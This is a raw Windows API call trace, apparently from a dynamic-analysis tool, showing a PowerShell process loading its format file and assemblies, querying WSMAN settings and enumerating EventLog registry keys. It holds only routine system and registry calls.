	[0352.163] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.163] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0xe98, lpOverlapped=0x0) returned 1
	[0352.164] ReadFile (in: hFile=0x320, lpBuffer=0x3101300, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101300*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.164] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0352.164] SetErrorMode (uMode=0x1) returned 0x1
	[0352.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0352.164] SetErrorMode (uMode=0x1) returned 0x1
	[0352.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0352.164] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x320) returned 0x0
	[0352.164] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0352.164] CoTaskMemAlloc (cb=0x5a) returned 0x46ed50
	[0352.164] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x46ed50, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0352.164] CoTaskMemFree (pv=0x46ed50) 
	[0352.164] RegCloseKey (hKey=0x320) returned 0x0
	[0352.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0352.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0352.165] VirtualQuery (in: lpAddress=0x1cbfe0, lpBuffer=0x1ccea0, dwLength=0x30 | out: lpBuffer=0x1ccea0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.165] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xc310e77f, Data2=0x12ee, Data3=0x4206, Data4=([0]=0xa9, [1]=0x9d, [2]=0xbe, [3]=0x1, [4]=0x63, [5]=0x43, [6]=0x6c, [7]=0xc9))) returned 0x0
	[0352.165] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9f079fe8, Data2=0xf0f2, Data3=0x46df, Data4=([0]=0x88, [1]=0x28, [2]=0x6d, [3]=0x88, [4]=0x9d, [5]=0xf0, [6]=0x4c, [7]=0x7d))) returned 0x0
	[0352.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0352.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0352.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0352.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0352.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0352.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0352.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0352.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0352.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0352.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0352.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.665] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.665] CoTaskMemFree (pv=0x436d30) 
	[0352.667] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.667] CoTaskMemFree (pv=0x436d30) 
	[0352.668] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.668] CoTaskMemFree (pv=0x436d30) 
	[0352.669] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.669] CoTaskMemFree (pv=0x436d30) 
	[0352.682] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.682] CoTaskMemFree (pv=0x436d30) 
	[0352.701] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.701] CoTaskMemFree (pv=0x436d30) 
	[0352.702] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0352.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.703] CoTaskMemFree (pv=0x436d30) 
	[0352.724] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd758 | out: phkResult=0x1cd758*=0x320) returned 0x0
	[0352.725] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd65c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd658, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd65c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd658*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0352.725] CoTaskMemFree (pv=0x0) 
	[0352.725] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0352.725] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x40c280, lpcchValueName=0x1cd708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0352.725] CoTaskMemFree (pv=0x40c280) 
	[0352.725] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0352.725] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x40c280, lpcchValueName=0x1cd708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0352.725] CoTaskMemFree (pv=0x40c280) 
	[0352.726] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0352.726] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x40c280, lpcchValueName=0x1cd708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0352.726] CoTaskMemFree (pv=0x40c280) 
	[0352.726] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd6ec, lpData=0x0, lpcbData=0x1cd6e8*=0x0 | out: lpType=0x1cd6ec*=0x1, lpData=0x0, lpcbData=0x1cd6e8*=0x8) returned 0x0
	[0352.726] CoTaskMemAlloc (cb=0xc) returned 0x45da10
	[0352.726] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd6bc, lpData=0x45da10, lpcbData=0x1cd6b8*=0x8 | out: lpType=0x1cd6bc*=0x1, lpData="2.0", lpcbData=0x1cd6b8*=0x8) returned 0x0
	[0352.726] CoTaskMemFree (pv=0x45da10) 
	[0353.168] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6a8 | out: phkResult=0x1cd6a8*=0x1b8) returned 0x0
	[0353.168] RegQueryInfoKeyW (in: hKey=0x1b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.168] CoTaskMemFree (pv=0x0) 
	[0353.168] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.168] RegEnumValueW (in: hKey=0x1b8, dwIndex=0x0, lpValueName=0x40c280, lpcchValueName=0x1cd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0353.168] CoTaskMemFree (pv=0x40c280) 
	[0353.168] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.168] RegEnumValueW (in: hKey=0x1b8, dwIndex=0x1, lpValueName=0x40c280, lpcchValueName=0x1cd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0353.169] CoTaskMemFree (pv=0x40c280) 
	[0353.169] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.169] RegEnumValueW (in: hKey=0x1b8, dwIndex=0x2, lpValueName=0x40c280, lpcchValueName=0x1cd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0353.169] CoTaskMemFree (pv=0x40c280) 
	[0353.169] RegQueryValueExW (in: hKey=0x1b8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd63c, lpData=0x0, lpcbData=0x1cd638*=0x0 | out: lpType=0x1cd63c*=0x1, lpData=0x0, lpcbData=0x1cd638*=0x8) returned 0x0
	[0353.169] CoTaskMemAlloc (cb=0xc) returned 0x45d970
	[0353.169] RegQueryValueExW (in: hKey=0x1b8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd60c, lpData=0x45d970, lpcbData=0x1cd608*=0x8 | out: lpType=0x1cd60c*=0x1, lpData="2.0", lpcbData=0x1cd608*=0x8) returned 0x0
	[0353.169] CoTaskMemFree (pv=0x45d970) 
	[0353.169] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0353.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.169] CoTaskMemFree (pv=0x436d30) 
	[0353.172] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0353.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.172] CoTaskMemFree (pv=0x436d30) 
	[0353.174] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x2f0) returned 0x0
	[0353.178] RegQueryInfoKeyW (in: hKey=0x2f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd64c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd648, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd64c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd648*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.178] CoTaskMemFree (pv=0x0) 
	[0353.179] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.179] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x0, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.179] CoTaskMemFree (pv=0x40c280) 
	[0353.179] CoTaskMemFree (pv=0x0) 
	[0353.179] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.179] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x1, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.179] CoTaskMemFree (pv=0x40c280) 
	[0353.179] CoTaskMemFree (pv=0x0) 
	[0353.179] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.179] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x2, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.179] CoTaskMemFree (pv=0x40c280) 
	[0353.179] CoTaskMemFree (pv=0x0) 
	[0353.179] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.179] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x3, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.179] CoTaskMemFree (pv=0x40c280) 
	[0353.179] CoTaskMemFree (pv=0x0) 
	[0353.179] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.179] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x4, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.179] CoTaskMemFree (pv=0x40c280) 
	[0353.180] CoTaskMemFree (pv=0x0) 
	[0353.180] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.180] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x5, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.180] CoTaskMemFree (pv=0x40c280) 
	[0353.180] CoTaskMemFree (pv=0x0) 
	[0353.180] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.180] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x6, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.180] CoTaskMemFree (pv=0x40c280) 
	[0353.180] CoTaskMemFree (pv=0x0) 
	[0353.180] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.180] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x7, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.180] CoTaskMemFree (pv=0x40c280) 
	[0353.180] CoTaskMemFree (pv=0x0) 
	[0353.180] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.180] RegEnumKeyExW (in: hKey=0x2f0, dwIndex=0x8, lpName=0x40c280, lpcchName=0x1cd6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0353.180] CoTaskMemFree (pv=0x40c280) 
	[0353.180] CoTaskMemFree (pv=0x0) 
	[0353.180] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x2f4) returned 0x0
	[0353.180] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.180] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x2f8) returned 0x0
	[0353.180] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x30c) returned 0x0
	[0353.181] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x31c) returned 0x0
	[0353.181] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x324) returned 0x0
	[0353.181] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x328) returned 0x0
	[0353.181] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x32c) returned 0x0
